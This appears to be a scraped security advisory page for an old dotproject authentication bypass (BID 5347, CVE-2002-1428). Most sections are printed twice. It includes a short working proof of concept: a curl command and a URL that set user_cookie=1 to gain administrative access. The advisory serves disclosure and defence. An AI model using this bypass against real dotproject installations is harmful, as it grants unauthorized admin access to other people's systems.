DotProject User Cookie Authentication Bypass Vulnerability
BID:5347
Info
DotProject User Cookie Authentication Bypass Vulnerability
| Bugtraq ID: | 5347 |
| Class: | Design Error |
| CVE: |
CVE-2002-1428 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 29 2002 12:00AM |
| Updated: | Jul 11 2009 02:56PM |
| Credit: | Discovery of this issue is credited to pokleyzz <[email protected]>. |
| Vulnerable: |
dotmarketing.org dotproject 0.2.1 .5 |
| Not Vulnerable: | |
Discussion
DotProject User Cookie Authentication Bypass Vulnerability
dotproject is prone to an issue which may allow remote attackers to bypass authentication and gain administrative access to the software.
This may be accomplished by submitting a maliciously crafted 'user_cookie' value either manually or via manipulation of URI parameters.
This problem is due to the software relying on the user 'cookie_value' to authenticate the user.
dotproject is prone to an issue which may allow remote attackers to bypass authentication and gain administrative access to the software.
This may be accomplished by submitting a maliciously crafted 'user_cookie' value either manually or via manipulation of URI parameters.
This problem is due to the software relying on the user 'cookie_value' to authenticate the user.
Exploit / POC
DotProject User Cookie Authentication Bypass Vulnerability
This issue may be exploited with a web browser. The following examples were submitted:
curl -b user_cookie=1 http://server/project/index.php?m=projects
or
http://server/project/index.php?m=projects&user_cookie=1
This issue may be exploited with a web browser. The following examples were submitted:
curl -b user_cookie=1 http://server/project/index.php?m=projects
or
http://server/project/index.php?m=projects&user_cookie=1
Solution / Fix
DotProject User Cookie Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
DotProject User Cookie Authentication Bypass Vulnerability
References:
References:
- dotproject Homepage (dotmarketing.org)